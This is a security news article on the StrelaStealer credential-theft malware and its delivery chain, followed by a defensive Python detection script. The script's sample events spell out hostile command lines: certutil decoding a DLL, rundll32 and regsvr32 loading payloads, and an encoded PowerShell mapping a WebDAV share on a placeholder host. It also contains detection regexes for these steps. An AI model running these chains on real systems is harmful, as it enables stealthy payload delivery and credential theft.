Security researchers have detailed the evolving tactics, techniques, and procedures (TTPs) of StrelaStealer, an information-stealing malware that has been active since its debut in 2022.
StrelaStealer, also known as “Strela,” is engineered to exfiltrate email credentials from widely used clients such as Microsoft Outlook and Mozilla Thunderbird, and continues to pose a significant threat, particularly across Europe and the United States.
Financially Motivated HIVE-0145 Group Drives Global Campaigns
Recent investigative efforts have attributed StrelaStealer’s operations to the threat actor group HIVE-0145, an entity flagged for credential theft and espionage-motivated campaigns.
Thought to function as a financially driven initial access broker (IAB), HIVE-0145 is believed to be the primary operator behind StrelaStealer, orchestrating mass phishing campaigns to deliver the malware to more than 100 organizations, with particular targeting in Italy, Spain, Germany, and Ukraine.
StrelaStealer campaigns predominantly use email-based social engineering. Victims receive ZIP attachments containing obfuscated JavaScript files, which, when executed, initiate a sequence of malicious activities.

The JavaScript runs a CertUtil decoding step (certutil’s Base64 decode) to recover a DLL payload, which is then loaded and executed in memory, a technique that sidesteps disk-based detection and complicates forensic analysis.
The malware relies on native Windows utilities such as rundll32.exe and regsvr32.exe to run that payload, a system binary proxy execution technique (MITRE ATT&CK T1218) aimed at evading endpoint defenses that trust signed Microsoft binaries.
Analysis of recent StrelaStealer campaigns reveals continuous adaptation in both delivery vectors and payload obfuscation.
In a high-profile campaign reported in March 2024, researchers observed malicious ZIP files containing JavaScript that downloaded and invoked highly obfuscated DLLs.
These payloads incorporated anti-analysis routines and alternate attachment formats to bypass detection by signature-based security tools.
Evolving Delivery Methods and Obfuscation Challenge Security Teams
By November 2024, the attackers behind StrelaStealer had further refined their methods: the initial JavaScript loader invoked WScript, which in turn spawned a Base64-encoded PowerShell command.
That command mapped a WebDAV network share with the “net use” utility, allowing the DLL payload to be fetched from the remote share and registered and executed through regsvr32.exe without a conventional download to disk.
Proxy execution through native Windows tools offers the operators two advantages: it blends with legitimate system activity, and it forces defenders to distinguish malicious from benign use of the same binaries rather than simply blocking them.
Post-infection, StrelaStealer’s focus shifts to reconnaissance and exfiltration.
The malware systematically inventories system information, enumerates installed software, checks locale settings, verifies internet connectivity, and traverses the file system.

Harvested credentials and reconnaissance data are exfiltrated over unencrypted HTTP POST requests, which blend with routine web traffic; the lack of encryption, however, means the request bodies are visible to network inspection, so egress monitoring that examines plaintext POST content is well placed to catch this stage.
To counter StrelaStealer, cybersecurity vendors like AttackIQ have developed emulation attack graphs simulating the full sequence of TTPs associated with this malware.
These tools enable organizations to validate and optimize their defensive measures against StrelaStealer’s behaviors in a controlled environment, ensuring greater resilience against credential theft campaigns.
Security experts emphasize the importance of robust detection and mitigation strategies, particularly focusing on ingress tool transfer, system binary proxy execution, and continuous validation of endpoint and network security controls.
Specific attention is recommended for monitoring anomalous use of native Windows utilities, scrutinizing encoded PowerShell payloads, and deploying network intrusion prevention systems to thwart malicious download and execution attempts.
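The detection guidance above (anomalous use of native Windows utilities, encoded PowerShell, WebDAV mapping via net use, and certutil decoding) can be expressed as simple heuristics over process-creation telemetry. The script below is an added example written for this article, not tooling from the researchers or vendors named in it. It runs over constructed process-creation events modelled on the two delivery chains described in the article; the paths, IP address (203.0.113.10, a documentation range), file names, and the exact command-line syntax are assumptions made for illustration, not indicators from a real StrelaStealer sample.

```python
"""Heuristic detection for the StrelaStealer-style execution chain described in the article.

Added example (not from the original article). The events below are constructed samples
modelled on the chain described in the article, not real telemetry or real indicators.
In production the same checks would run over Sysmon Event ID 1 or Windows 4688 records.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process image name, e.g. "wscript.exe"
    image: str     # child process image name
    cmdline: str   # full command line as logged


# Build an -EncodedCommand argument the way PowerShell expects it: Base64 of UTF-16LE text.
# The mapped share syntax (\\host@port\DavWWWRoot) is the standard Windows WebDAV UNC form;
# the host and share here are constructed for the example.
_PS_SCRIPT = r"net use \\203.0.113.10@80\DavWWWRoot"
ENC = base64.b64encode(_PS_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed sample events: the first four mirror the ZIP -> JS -> certutil -> rundll32 chain,
# the next three the JS -> WScript -> encoded PowerShell -> net use -> regsvr32 chain.
# The last two are benign controls that should not be flagged.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\Invoice_12.js"'),
    ProcEvent("wscript.exe", "certutil.exe",
              r"certutil -decode C:\Users\u\AppData\Local\Temp\a.txt C:\Users\u\AppData\Local\Temp\a.dll"),
    ProcEvent("wscript.exe", "rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Local\Temp\a.dll,Entry"),
    ProcEvent("wscript.exe", "powershell.exe", "powershell.exe -nop -w hidden -EncodedCommand " + ENC),
    ProcEvent("powershell.exe", "net.exe", r"net use \\203.0.113.10@80\DavWWWRoot"),
    ProcEvent("powershell.exe", "regsvr32.exe", r"regsvr32 /s \\203.0.113.10@80\DavWWWRoot\payload.dll"),
    ProcEvent("explorer.exe", "regsvr32.exe", r"regsvr32 /s C:\Program Files\Vendor\comp.dll"),  # benign
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),                            # benign
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PROXY_BINS = {"rundll32.exe", "regsvr32.exe"}
SUSPICIOUS_CHILDREN = PROXY_BINS | {"certutil.exe", "powershell.exe", "cmd.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (PowerShell accepts all prefixes).
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# WebDAV targets: \\host@port\..., \\host@SSL@port\..., \\host\DavWWWRoot, or an http(s) URL.
WEBDAV_TARGET = re.compile(r"\\\\[^\\\s]+@(?:SSL@)?\d+\\|\\\\[^\\\s]+\\DavWWWRoot|https?://", re.IGNORECASE)
# Module or script paths under user-writable locations commonly used by mail-borne loaders.
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Downloads|Public)\\", re.IGNORECASE)


def decode_encoded_powershell(cmdline: str):
    """Return the decoded script text if the command line carries -EncodedCommand, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: treat as not decodable rather than crash the pipeline


def classify(ev: ProcEvent):
    """Return the list of heuristics this event triggers; an empty list means nothing matched."""
    reasons = []
    img, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline
    if img in SCRIPT_HOSTS and re.search(r"\.jse?\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        reasons.append("script host running a .js file from a user-writable path")
    if parent in SCRIPT_HOSTS and img in SUSPICIOUS_CHILDREN:
        reasons.append(f"{ev.parent} spawned {ev.image}")
    if img == "certutil.exe" and re.search(r"-(?:decode|decodehex|urlcache)\b", cmd, re.I):
        reasons.append("certutil used to decode or download a file")
    if img in PROXY_BINS and USER_WRITABLE.search(cmd):
        reasons.append(f"{ev.image} loading a module from a user-writable path")
    if img in PROXY_BINS and WEBDAV_TARGET.search(cmd):
        reasons.append(f"{ev.image} loading a module over WebDAV")
    if img == "net.exe" and re.search(r"\buse\b", cmd, re.I) and WEBDAV_TARGET.search(cmd):
        reasons.append("net use mapping a WebDAV share")
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        if WEBDAV_TARGET.search(decoded) or re.search(r"\bnet\s+use\b", decoded, re.I):
            reasons.append("decoded PowerShell maps a network share")
    return reasons


def flag_chain(events):
    """Return [(event, reasons)] for every event that triggered at least one heuristic."""
    flagged = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


if __name__ == "__main__":
    for ev, reasons in flag_chain(SAMPLE_EVENTS):
        print(f"{ev.parent} -> {ev.image}: {'; '.join(reasons)}")
```

Run stand-alone, the script flags the six events that make up the two chains and leaves the two benign controls untouched. The decoded PowerShell is inspected as text rather than matched on its Base64 form, which is the point of the "scrutinize encoded PowerShell" advice: the encoding changes with every whitespace tweak, the decoded intent does not. Parent-child pairing (wscript.exe spawning certutil.exe, rundll32.exe or powershell.exe) is deliberately kept as its own rule because it survives changes to file names and share addresses.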
With StrelaStealer’s operators continually refining their evasion techniques and delivery strategies, ongoing threat intelligence and adaptive security validation remain critical.
Organizations are urged to integrate these advanced emulation tools and detection signatures into their security programs to effectively combat this evolving email credential theft threat.